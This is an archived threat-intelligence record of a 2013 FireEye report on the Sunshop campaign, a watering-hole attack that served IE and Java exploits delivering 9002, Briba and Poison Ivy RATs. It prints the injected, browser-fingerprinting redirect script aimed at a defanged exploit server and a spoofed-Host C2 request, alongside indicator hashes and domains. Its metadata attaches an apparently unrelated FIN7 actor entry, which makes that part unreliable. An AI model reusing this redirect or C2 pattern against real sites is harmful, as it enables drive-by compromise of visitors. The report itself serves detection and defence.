{
	"id": "20d1567e-d899-4fcd-9550-21c221ff92cb",
	"created_at": "2026-04-06T00:09:33.232811Z",
	"updated_at": "2026-04-10T03:31:13.336006Z",
	"deleted_at": null,
	"sha1_hash": "e2b672c9d5a0f76ce01d12f69a0d2c0a5891a936",
	"title": "Ready for Summer: The Sunshop Campaign",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 46936,
	"plain_text": "Ready for Summer: The Sunshop Campaign\r\nBy Ned Moran\r\nPublished: 2013-05-20 · Archived: 2026-04-05 19:41:38 UTC\r\nFireEye recently identified another targeted attack campaign that leveraged both the recently announced Internet Explorer zero-day, CVE-2013-1347, and the recently patched Java exploits CVE-2013-2423 and CVE-2013-1493. This campaign appears to have affected a number of victims, based on the use of the Internet Explorer zero-day as well as the amount of traffic observed making requests to the exploit server. This attack was likely executed by an actor we have named the 'Sunshop Group'. This actor was also responsible for the 2010 compromise of the Nobel Peace Prize website, which leveraged a zero-day in Mozilla Firefox.\r\nImpacted Sites\r\nThe campaign in question compromised a number of strategic websites including:\r\n• Multiple Korean military and strategy think tanks\r\n• A Uyghur news and discussion forum\r\n• A science and technology policy journal\r\n• A website for evangelical students\r\nA call to a malicious JavaScript file hosted at www[.]sunshop[.]com[.]tw was inserted into all of these compromised websites.\r\nThe Exploit Server\r\nIf a visitor to one of these compromised websites was running Internet Explorer 8.0, the malicious JavaScript would redirect them to a page at www[.]sunshop[.]com[.]tw hosting a CVE-2013-1347 exploit. 
Any other victims were redirected to a page that downloaded two malicious jars. The injected redirect logic also checked the browser's user language and the Windows version before choosing a landing page:\r\nif(browser==\"Microsoft Internet Explorer\" && trim_Version==\"MSIE8.0\" && window.navigator.userLanguage.indexOf(\"en\")>-1)\r\n{\r\n    if(sys_Version==\"WindowsNT5.1\")\r\n    {\r\n        showexp(\"hxxp://www[.]sunshop[.]com[.]tw/xxxxxx/xxxxximg.html\");\r\n    }\r\n    else\r\n        showexp(\"hxxp://www[.]sunshop[.]com[.]tw/xxxxxx/xxxxxxxmig.html\");//J\r\n}\r\nelse\r\n    showexp(\"hxxp://www[.]sunshop[.]com[.]tw/xxxxxx/xxxxxxxmig.html\");//J\r\nDropped Payloads and C&C Infrastructure\r\nThe Internet Explorer (CVE-2013-1347) exploit code pulled down a “9002” RAT from another compromised site at hk[.]sz181[.]com. This payload had an MD5 of b0ef2ab86f160aa416184c09df8388fe and connected to a command and control server at dns[.]homesvr[.]tk.\r\nThe Java exploits were packaged as two different jar files. One jar file had an MD5 of f4bee1e845137531f18c226d118e06d7 and exploited CVE-2013-2423. The second jar file had an MD5 of 3fbb7321d8610c6e2d990bb25ce34bec and exploited CVE-2013-1493.\r\nThe jar that exploited CVE-2013-2423 dropped a 9002 RAT with an MD5 of d99ed31af1e0ad6fb5bf0f116063e91f. This RAT connected to a command and control server at asp[.]homesvr[.]linkpc[.]net. The jar that exploited CVE-2013-1493 dropped a 9002 RAT with an MD5 of 42bd5e7e8f74c15873ff0f4a9ce974cd. This RAT connected to a command and control server at ssl[.]homesvr[.]tk.\r\nAll of the above 9002 command and control domains resolved to 58.64.205.53. 
We previously discussed the extensive use of this RAT in other advanced persistent threat (APT) campaigns here.\r\nRelated Infrastructure\r\nAfter further research into 58.64.205.53 with our friends at Mandiant, we uncovered a Briba sample with the MD5 6fe0f6e68cd9cc6ed7e100e7b3626665 that connected to this IP address. As seen in this malwr report, the command and control domain nameserver1[.]zapto[.]org resolved to the same 58.64.205.53 IP address on 2013-05-07. This Briba sample generated the following network traffic to nameserver1[.]zapto[.]org over port 443:\r\nPOST /index000001021.asp HTTP/1.1\r\nAccept-Language: en-us\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;)\r\nHost: update.microsoft.com\r\nConnection: Keep-Alive\r\nContent-Type: text/html\r\nContent-Length: 000041\r\nNote that the Host header names update.microsoft.com even though the request was sent to nameserver1[.]zapto[.]org; this mismatch between the claimed host and the actual destination is a useful detection signal for this traffic.\r\nFor a detailed analysis of Briba please see Seth Hardy’s paper ‘IExplore RAT’.\r\nThe exploit site at sunshop[.]com[.]tw previously hosted a different malicious jar file on April 2, 2013. This jar file had an MD5 of 51aff823274e9d12b1a9a4bbbaf8ce00. It exploited CVE-2013-1493 and dropped a Poison Ivy RAT with the MD5 2B6605B89EAD179710565D1C2B614665. This Poison Ivy RAT connected to a command and control server at 9ijhh45[.]zapto[.]org over port 443 using a password of ‘ult4life’. This domain resolved to the same 58.64.205.53 IP between April 2nd and 8th.\r\nAttribution\r\nThe Sunshop Group has utilized the same tactics described above in previous targeted attack campaigns. These similar tactics include the use of zero-day exploits, strategic web compromise, and Briba malware.\r\nOne of the more prominent attacks launched by this group was the compromise of the Nobel Peace Prize Committee’s website in 2010. This attack leveraged a zero-day exploit targeting a previously unknown vulnerability in Mozilla Firefox.\r\nAnother publicly documented attack exploited a Flash zero-day and can be found here. 
Mila at the Contagio Blog posted additional information on this attack here. This attack dropped the same Briba payload discussed above.\r\nFireEye detects the Briba backdoor as Backdoor.APT.IndexASP and the 9002 payloads as Trojan.APT.9002.\r\nMalware\r\nCVE | Exploit hash | Payload hash | Malware family | C&C Host\r\nCVE-2013-1347 | fb24c49299b197e1b56a1a51430aea26 | b0ef2ab86f160aa416184c09df8388fe | 9002 | dns[.]homesvr[.]tk\r\nCVE-2013-2423 | f4bee1e845137531f18c226d118e06d7 | d99ed31af1e0ad6fb5bf0f116063e91f | 9002 | asp[.]homesvr[.]linkpc[.]net\r\nCVE-2013-1493 | 3fbb7321d8610c6e2d990bb25ce34bec | 42bd5e7e8f74c15873ff0f4a9ce974cd | 9002 | ssl[.]homesvr[.]tk\r\nUnknown | Unknown | 6fe0f6e68cd9cc6ed7e100e7b3626665 | Briba | nameserver1[.]zapto[.]org\r\nCVE-2013-1493 | 51aff823274e9d12b1a9a4bbbaf8ce00 | 2B6605B89EAD179710565D1C2B614665 | Poison Ivy | 9ijhh45[.]zapto[.]org\r\nSource: 
https://web.archive.org/web/20200302085651/https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://web.archive.org/web/20200302085651/https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html"
	],
	"report_names": [
		"ready-for-summer-the-sunshop-campaign.html"
	],
	"threat_actors": [
		{
			"id": "1f3cf3d1-4764-4158-a216-dd6352e671bb",
			"created_at": "2022-10-25T15:50:23.837615Z",
			"updated_at": "2026-04-10T02:00:05.322197Z",
			"deleted_at": null,
			"main_name": "APT19",
			"aliases": [
				"APT19",
				"Codoso",
				"C0d0so0",
				"Codoso Team",
				"Sunshop Group"
			],
			"source_name": "MITRE:APT19",
			"tools": [
				"Cobalt Strike"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "0639667a-fb3f-43d9-a38c-6c123fd19c7f",
			"created_at": "2022-10-25T16:07:23.335869Z",
			"updated_at": "2026-04-10T02:00:04.547702Z",
			"deleted_at": null,
			"main_name": "APT 19",
			"aliases": [
				"APT 19",
				"Bronze Firestone",
				"C0d0so0",
				"Checkered Typhoon",
				"Codoso",
				"Deep Panda",
				"G0009",
				"G0073",
				"Operation Kingslayer",
				"Red Pegasus",
				"Sunshop Group",
				"TG-3551"
			],
			"source_name": "ETDA:APT 19",
			"tools": [
				"Agentemis",
				"C0d0so0",
				"Cobalt Strike",
				"CobaltStrike",
				"Derusbi",
				"EmPyre",
				"EmpireProject",
				"Fire Chili",
				"PowerShell Empire",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "46a151bd-e4c2-46f9-aee9-ee6942b01098",
			"created_at": "2023-01-06T13:46:38.288168Z",
			"updated_at": "2026-04-10T02:00:02.911919Z",
			"deleted_at": null,
			"main_name": "APT19",
			"aliases": [
				"DEEP PANDA",
				"Codoso",
				"KungFu Kittens",
				"Group 13",
				"G0009",
				"G0073",
				"Checkered Typhoon",
				"Black Vine",
				"TEMP.Avengers",
				"PinkPanther",
				"Shell Crew",
				"BRONZE FIRESTONE",
				"Sunshop Group"
			],
			"source_name": "MISPGALAXY:APT19",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f4f16213-7a22-4527-aecb-b964c64c2c46",
			"created_at": "2024-06-19T02:03:08.090932Z",
			"updated_at": "2026-04-10T02:00:03.6289Z",
			"deleted_at": null,
			"main_name": "GOLD NIAGARA",
			"aliases": [
				"Calcium ",
				"Carbanak",
				"Carbon Spider ",
				"FIN7 ",
				"Navigator ",
				"Sangria Tempest ",
				"TelePort Crew "
			],
			"source_name": "Secureworks:GOLD NIAGARA",
			"tools": [
				"Bateleur",
				"Carbanak",
				"Cobalt Strike",
				"DICELOADER",
				"DRIFTPIN",
				"GGLDR",
				"GRIFFON",
				"JSSLoader",
				"Meterpreter",
				"OFFTRACK",
				"PILLOWMINT",
				"POWERTRASH",
				"SUPERSOFT",
				"TAKEOUT",
				"TinyMet"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434173,
	"ts_updated_at": 1775791873,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e2b672c9d5a0f76ce01d12f69a0d2c0a5891a936.pdf",
		"text": "https://archive.orkl.eu/e2b672c9d5a0f76ce01d12f69a0d2c0a5891a936.txt",
		"img": "https://archive.orkl.eu/e2b672c9d5a0f76ce01d12f69a0d2c0a5891a936.jpg"
	}
}